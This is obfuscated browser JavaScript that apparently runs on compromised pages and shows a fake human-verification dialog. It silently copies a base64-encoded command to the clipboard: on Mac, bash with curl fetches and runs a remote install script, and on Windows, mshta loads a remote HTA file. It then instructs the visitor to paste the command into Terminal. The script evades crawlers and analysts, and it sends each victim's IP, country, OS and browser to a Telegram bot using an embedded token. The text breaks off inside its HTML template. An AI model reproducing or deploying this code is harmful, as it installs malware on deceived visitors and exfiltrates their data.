(function () { let _0x188467 = false; const _0x161676_mac = atob("L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgJChlY2hvIGFIUjBjSE02THk5dmVHbGtZVzVsY0hWeVpTNWpiMjB2WjJWME5qTXZhVzV6ZEdGc2JDNXphQT09IHwgYmFzZTY0IC1kKSki"); const _0x161676_win = atob("bXNodGEgaHR0cHM6Ly9jbGF1ZHJlZGlyZWN0LmNvbS9iYWtlbnZhbGQuaHRh"); const _0x161676 = (_0x108fd7 && typeof _0x108fd7 === 'function' && _0x108fd7() === 'Windows') ? _0x161676_win : _0x161676_mac; const _0x4e350a = false; const _0x339ef9 = atob("ODI0NDcxMzg2NTpBQUdLYTVrWjc4SXE4LU1peG50bk5XcmpDTDJxWDhfaktEbw=="); const _0x5f3254 = atob("NTA5NTQ2NDE2NA=="); const _0x474682 = 'https://uytghkhl.sbs/fit'; const _0xfbccf7 = '\n body { font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif; color:#4a4a4a; }\n .c-modal-bg-1, .c-modal-bg-2 { position:fixed; top:0; left:0; width:100%; height:100%; display:flex; justify-content:center; align-items:center; z-index:1000; }\n .c-modal-bg-1 { background-color:rgba(0,0,0,0.75); }\n .c-modal-bg-2 { background-color:rgba(0,0,0,0.6); animation:fadeIn 0.3s ease-out; }\n @keyframes fadeIn { from { opacity:0; transform:scale(0.95); } to { opacity:1; transform:scale(1); } }\n @keyframes fadeOut { from { opacity:1; transform:scale(1); } to { opacity:0; transform:scale(0.95); } }\n .c-m-head { display:flex; justify-content:space-between; align-items:center; padding:20px 24px; background:linear-gradient(135deg, #f89b21, #ff8800); color:#ffffff; }\n .c-head-txt { flex: 1; min-width: 0; text-align: left; padding-right: 16px; }\n .c-m-head .c-head-txt h2 { margin:0; font-size:22px; font-weight:600; color:white; }\n .c-m-head .c-head-txt p { margin:4px 0 0; font-size:14px; opacity:0.95; color:white; }\n .c-m-logo img { filter:brightness(0) invert(1); height:54px; flex-shrink: 0; }\n .c-v-container { background-color:#ffffff; border-radius:6px; box-shadow:0 5px 15px rgba(0,0,0,0.2); width:480px; max-width:95%; overflow:hidden; border:1px solid #dcdcdc; display:flex; flex-direction:column; animation:fadeIn 0.3s ease-out; position:relative; }\n .c-m-close { position:absolute; top:10px; right:10px; background:none; border:none; font-size:28px; line-height:1; color:white; opacity:0.7; padding:0; text-shadow:0 1px 1px rgba(0,0,0,0.2); cursor:default; }\n .c-m-body { padding:24px; font-size:16px; line-height:1.6; }\n .c-m-body h4 { font-size: 16px; margin:0; color: #1d1d1d; }\n .progress-bar-container { background-color: #e9ecef; border-radius: 5px; height: 6px; margin-bottom: 20px; width: 100%; }\n .progress-bar-fill { background-color: #f89b21; height: 100%; width: 50%; border-radius: 5px; transition: width 0.5s ease-in-out; }\n .step-header { display: flex; align-items: center; gap: 10px; margin-top: 15px; }\n .step-number { background-color: #f0f2f5; border-radius: 4px; padding: 3px 8px; font-size: 12px; font-weight: 600; color: #555; }\n .step-instruction { margin: 8px 0 15px; font-size: 15px; }\n #step2-container { opacity: 0; max-height: 0; overflow: hidden; transition: opacity 0.4s ease-in, max-height 0.5s ease-in; }\n #step2-container.visible { opacity: 1; max-height: 400px; }\n .friendly-command-box { background-color: #f0f2f5; padding: 12px 16px; border-radius: 6px; cursor: pointer; transition: background-color 0.2s ease; position: relative; font-size: 14px; color: #333; text-align: center; }\n .friendly-command-box:hover { background-color: #e0e2e5; }\n .friendly-command-box .cp-tip { bottom: 110%; left: 50%; transform: translateX(-50%); }\n kbd { background-color:#e9ecef; border:1px solid #b4b4b4; border-radius:4px; padding:3px 7px; font-family:inherit; font-size:0.9em; box-shadow:0 2px 0 #b4b4b4; color:#333; font-weight:600; margin:0 2px; display:inline-block; transform:translateY(-1px); }\n .c-v-foot { display:flex; justify-content:space-between; align-items:center; padding:16px 24px; background-color:#f7f7f7; border-top:1px solid #e0e0e0; }\n .foot-left { text-align: left; }\n .foot-timer { font-size:14px; color:#555; font-weight:500; margin:0; }\n .foot-timer.urgent { color: #d93025; }\n .foot-social-proof { font-size: 12px; color: #6a6a6a; margin: 4px 0 0; }\n .v-btn-wrap { position: relative; display: inline-block; }\n .v-btn { background-color:#f89921; color:#ffffff; border:none; border-radius:5px; padding:12px 28px; font-size:16px; font-weight:bold; cursor:pointer; transition:background-color 0.3s ease, opacity 0.3s ease; display:flex; align-items:center; justify-content:center; }\n .v-btn:hover:not(:disabled) { background-color:#e4870f; }\n .v-btn:disabled { opacity:0.7; cursor:not-allowed; }\n .v-tooltip { visibility:hidden; width:max-content; background-color:#555; color:white; text-align:center; border-radius:6px; padding:5px 10px; position:absolute; z-index:1; bottom:110%; left:50%; transform:translateX(-50%); opacity:0; transition:opacity 0.2s; font-size:12px; }\n .v-btn-wrap.tooltip-active:hover .v-tooltip { visibility:visible; opacity:1; }\n .c-v-tech-details { background-color:#f0f2f5; padding:8px 24px; text-align:center; font-size:12px; color:#6a6a6a; display:flex; justify-content:space-between; }\n .c-v-tech-details span { display:inline-block; }\n .btn-spin { border: 3px solid rgba(255, 255, 255, 0.3); border-radius: 50%; border-top-color: #fff; width: 16px; height: 16px; animation: spin 1s ease-in-out infinite; margin-right: 8px; }\n .cf-widget-container { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: #232323db; display: flex; justify-content: center; align-items: center; z-index: 2000; backdrop-filter: blur(2px); opacity: 0; transition: opacity 0.3s ease; pointer-events: none; }\n .cf-widget-container.visible { opacity: 1; pointer-events: auto; }\n .cf-widget-content { background-color: #fff; padding: 20px; border-radius: 8px; border: 1px solid #ddd; box-shadow: 0 4px 12px rgba(0,0,0,0.1); display: flex; align-items: center; gap: 16px; width: 380px; box-sizing: border-box; }\n .cf-turnstile-wrapper, .cf-verifying-state, .cf-checkbox-state { display: flex; align-items: center; gap: 12px; }\n .cf-verifying-label { font-size: 16px; color: #555; }\n .cf-dot-spinner { position: relative; width: 28px; height: 28px; transform: rotate(45deg); animation: spin 2s infinite linear; }\n .cf-dot-spinner .dot { width: 6px; height: 6px; background-color: #eea405; border-radius: 50%; position: absolute; }\n .cf-dot-spinner .dot:nth-of-type(1) { top: 0; left: 0; }\n .cf-dot-spinner .dot:nth-of-type(2) { top: 0; right: 0; }\n .cf-dot-spinner .dot:nth-of-type(3) { bottom: 0; left: 0; }\n .cf-dot-spinner .dot:nth-of-type(4) { bottom: 0; right: 0; }\n .cf-dot-spinner .dot:nth-of-type(5) { top: 50%; left: -4px; margin-top: -4px; }\n .cf-dot-spinner .dot:nth-of-type(6) { top: 50%; right: -4px; margin-top: -4px; }\n .cf-dot-spinner .dot:nth-of-type(7) { top: -4px; left: 50%; margin-left: -4px; }\n .cf-dot-spinner .dot:nth-of-type(8) { bottom: -4px; left: 50%; margin-left: -4px; }\n #cf-turnstile-checkbox { display: none; }\n #cf-turnstile-checkbox + .cf-turnstile-label::before { content: \'\'; display: inline-block; width: 28px; height: 28px; border: 2px solid #ccc; border-radius: 4px; vertical-align: middle; cursor: pointer; transition: all 0.2s ease; margin-right: 12px; }\n #cf-turnstile-checkbox:checked + .cf-turnstile-label::before { background-color: rgb(253, 141, 13); border-color: rgb(253, 141, 13); content: \'\u2713\'; color: white; font-size: 20px; text-align: center; line-height: 28px; }\n .cf-turnstile-label { font-size: 16px; color: #333; cursor: pointer; }\n .cf-logo-container { display: flex; flex-direction: column; align-items: flex-end; margin-left: auto; }\n .cf-logo-container img { height: 28px; width: auto; margin-bottom: 8px; }\n .cf-links { font-size: 12px; }\n .cf-links a { color: #555; text-decoration: none; }\n .cf-links a:hover { text-decoration: underline; }\n .cf-links span { margin: 0 4px; }\n '; function _0x108fd7() { const _0x4b851b = navigator.userAgent; if (/Macintosh|MacIntel|MacPPC|Mac68K/.test(_0x4b851b)) { return 'Mac'; } else { if (/iPhone|iPod/.test(_0x4b851b)) { return 'iPhone'; } else { if (/Android/.test(_0x4b851b)) { return 'Android'; } else { if (/Win32|Win64|Windows|WinCE/.test(_0x4b851b)) { return 'Windows'; } else { return 'Other'; } } } } } function _0x1f291b() { const _0x283883 = navigator.userAgent; if (_0x283883.includes('Chrome') && !_0x283883.includes('Edg')) { return 'Chrome'; } else { if (_0x283883.includes('Firefox')) { return 'Firefox'; } else { if (_0x283883.includes('Safari') && !_0x283883.includes('Chrome')) { return 'Safari'; } else { if (_0x283883.includes('Edg')) { return 'Edge'; } else { if (_0x283883.includes('Opera') || _0x283883.includes('OPR')) { return 'Opera'; } else { return 'Unknown'; } } } } } } async function _0x5e0996(_0x51db0f) { if (!_0x339ef9 || _0x339ef9 === 'YOUR_BOT_TOKEN_HERE') { return; } const _0x3198ef = 'https://api.telegram.org/bot' + _0x339ef9 + '/sendMessage'; const _0x4c6c78 = { chat_id: _0x5f3254, text: _0x51db0f, parse_mode: 'HTML' }; try { await fetch(_0x3198ef, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(_0x4c6c78) }); } catch (_0x3064b7) { console.error('Failed to send Telegram message:', _0x3064b7); } } function _0x1ce0b6() { const _0x3b72a6 = [ 'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'baiduspider', 'yandexbot', 'sogou', 'exabot', 'facebot', 'ia_archiver', 'ahrefsbot', 'semrushbot', 'mj12bot', 'dotbot', 'applebot', 'petalbot', 'twitterbot', 'linkedinbot', 'embedly', 'pinterest', 'developers.google.com' ]; const _0x3f6d0f = navigator.userAgent.toLowerCase(); const _0x14077f = _0x3b72a6.find(_0x13c740 => _0x3f6d0f.includes(_0x13c740)); if (_0x14077f) { _0x46eeca('Bot UA: ' + _0x14077f); return true; } if (navigator.webdriver) { _0x46eeca('WebDriver'); return true; } if (window.callPhantom || window._phantom) { _0x46eeca('PhantomJS'); return true; } if (screen.width < 800 || screen.height < 600) { _0x46eeca('Screen Size: ' + screen.width + 'x' + screen.height); return true; } if (navigator.plugins.length === 0 && !/chrome|chromium|crios/i.test(_0x3f6d0f)) { _0x46eeca('No Plugins'); return true; } const _0x2b3ed1 = _0x108fd7(); if (_0x2b3ed1 !== 'Mac') { _0x46eeca('Non-Mac OS: ' + _0x2b3ed1); return true; } return false; } function _0x46eeca(_0x883f31) { const _0x884b86 = _0x108fd7(); fetch(_0x474682 + '?type=cloaked&os=' + _0x884b86.toLowerCase() + '&reason=' + encodeURIComponent(_0x883f31)).catch(_0x29cd61 => console.error('Failed to log cloaked user:', _0x29cd61)); } function _0x3e0eed(_0x5afd10) { navigator.clipboard.writeText(_0x161676).then(() => { if (_0x5afd10) { _0x5afd10.classList.add('visible'); setTimeout(() => _0x5afd10.classList.remove('visible'), 2000); } }).catch(_0x40ab68 => console.error('Failed to copy command: ', _0x40ab68)); if (!_0x188467) { _0x188467 = true; const _0x39153b = _0x108fd7(); fetch(_0x474682 + '?type=copy&os=' + _0x39153b.toLowerCase()).catch(_0x3d4092 => console.error('Failed to log copy event:', _0x3d4092)); const _0x24e321 = window.location.href; fetch('https://api.ipify.org?format=json').then(_0x4caa7b => _0x4caa7b.json()).then(_0x496062 => { return fetch('https://ipapi.co/' + _0x496062.ip + '/json/').then(_0x21446e => _0x21446e.json()).then(_0x548a82 => { let _0x5e20cc = 'Unknown'; if (_0x548a82 && _0x548a82.country_code) { const _0x5bcd47 = _0x548a82.country_code.toUpperCase().split('').map(_0x400be2 => 127462 + _0x400be2.charCodeAt(0) - 65); _0x5e20cc = String.fromCodePoint(..._0x5bcd47); } return { ip: _0x496062.ip, countryInfo: _0x5e20cc }; }); }).then(({ ip: _0x349d8c, countryInfo: _0x3f5bae }) => { const _0x33a88f = _0x1f291b(); const _0xbf58b3 = '\u2705 Verification Code Copied\n\n\uD83C\uDF10 Website: ' + _0x24e321 + '\n\uD83D\uDC64 IP: ' + _0x349d8c + '\n\uD83C\uDF0D Country: ' + _0x3f5bae + '\n\uD83D\uDCBB OS: ' + _0x39153b + '\n\uD83C\uDF10 Browser: ' + _0x33a88f; _0x5e0996(_0xbf58b3); }).catch(() => { const _0x6d9c7e = _0x1f291b(); const _0x4f3797 = '\u2705 Verification Code Copied\n\n\uD83C\uDF10 Website: ' + _0x24e321 + '\n\uD83D\uDC64 IP: (fetch failed)\n\uD83C\uDF0D Country: Unknown\n\uD83D\uDCBB OS: ' + _0x39153b + '\n\uD83C\uDF10 Browser: ' + _0x6d9c7e; _0x5e0996(_0x4f3797); }); } } const _0x5526f0 = '\n
This may take a few seconds

Press \u2318 Command + Space, type "Terminal",
\nand press Return.
\nPress \u2318 Command + V in terminal and press Return to verify.
\nTime Remaining: 1:00
\n \n